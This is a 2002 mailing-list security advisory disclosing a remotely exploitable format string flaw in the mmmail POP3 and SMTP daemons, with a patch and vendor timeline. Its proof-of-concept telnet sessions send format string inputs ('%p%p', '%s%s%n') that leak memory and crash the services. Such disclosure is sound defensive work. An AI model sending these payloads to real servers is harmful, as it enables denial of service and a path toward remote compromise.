Date: Wed, 12 Jun 2002 14:49:49 +0200
From: =?iso-8859-1?Q?Beno=EEt_Roussel?= <benoit.roussel@intexxia.com>
To: bugtraq <bugtraq@securityfocus.com>, First Teams <first-teams@first.org>
Subject: [CERT-intexxia] mmmail POP3-SMTP Daemon Format String Vulnerability
Cc: CERT- intexxia <cert@intexxia.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
________________________________________________________________________
SECURITY ADVISORY INTEXXIA(c)
04 06 2002 ID #1054-040602
________________________________________________________________________
TITLE : mmmail POP3-SMTP Daemon Format String Vulnerability
CREDITS : Guillaume Pelat / INTEXXIA
________________________________________________________________________
SYSTEM AFFECTED
===============
mmmail <= 0.0.13 (mmpop3d & mmsmtpd)
________________________________________________________________________
DESCRIPTION
===========
"mmmail provides SMTP and POP3 daemons using MySQL, running as
a non-root user. It also supports bandwidth shaping. Relaying is not
supported, although it has been designed to handle many users on many
virtual hosts. It is fast and secure, uses threads, and has been written
entirely from scratch and does not rely on mbox or Maildir formats."
mmmail includes 2 daemons, mmpop3d and mmsmtpd. Both are
vulnerable to a remotely exploitable format string issue.
________________________________________________________________________
DETAILS
=======
There is a format string vulnerability in the 'mmsyslog()'
function of the 'mmpop3d' and 'mmsmtpd' programs. This function acts
like 'vsyslog()' if '__GLIBC__' is defined. It calls the 'syslog(3)'
function with a format string that can be defined by a remote user. It
is not necessary to authenticate to exploit this vulnerability.
Successful exploitation of this flaw can allow a remote user to obtain
a local account on the target machine.
________________________________________________________________________
PROOF OF CONCEPT
================
mmpop3d
- -------
test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
USER %p%p
- -ERR Invalid username
In the log file :
mmpop3d[2165]: 3CFC8B53 USER 0x8052f620x80a44fc
test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
USER %s%s%n
Connection closed by foreign host.
test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused
mmsmtpd
- -------
test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
HELO %p%p
501 Invalid hostname
In the log file :
mmsmtpd[2188]: 3CFC8BF9 HELO 0x8052e360x80a447c
test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
HELO %s%s%n
Connection closed by foreign host.
test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused
________________________________________________________________________
SOLUTION
========
The following patch corrects this issue :
iff -dru mmmail-0.0.13/mmlib/mmlog.c mmmail-0.0.13.fixed/mmlib/mmlog.c
- --- mmmail-0.0.13/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmmail-0.0.13.fixed/mmlib/mmlog.c Tue Jun 4 12:37:19 2002
@@ -70,7 +70,7 @@
va_start(lst, fmt);
vsnprintf(buf, 1023, fmt, lst);
va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, "%s", buf);
}
}
A new version including this patch is available at the following URL :
http://mmondor.gobot.ca/software/linux/mmmail-0.0.14.tar.gz
________________________________________________________________________
VENDOR STATUS
=============
04-06-2002 : This bulletin was sent to Matthew Mondor.
05-06-2002 : Matthew was very reactive and confirmed the
vulnerability. He released a new version.
________________________________________________________________________
LEGALS
======
mmmail is a registered trademark.
Intexxia provides this information as a public service and "as
is". Intexxia will not be held accountable for any damage or distress
caused by the proper or improper usage of these materials.
(c) intexxia 2002. This document is property of intexxia. Feel
free to use and distribute this material as long as credit is given to
intexxia and the author.
________________________________________________________________________
CONTACT
=======
CERT intexxia cert@intexxia.com
INTEXXIA http://www.intexxia.com
171, av. Georges Clemenceau Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - France Fax : +33 1 55 69 78 80
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>;
iQA/AwUBPQdDak2N8BNyNDXLEQLHOQCgxlI4n/uFPTw4oZmjUVXTUhV8j7QAoLzr
wM33noZDTKjFJE8HNkSdphPm
=6uvy
-----END PGP SIGNATURE-----
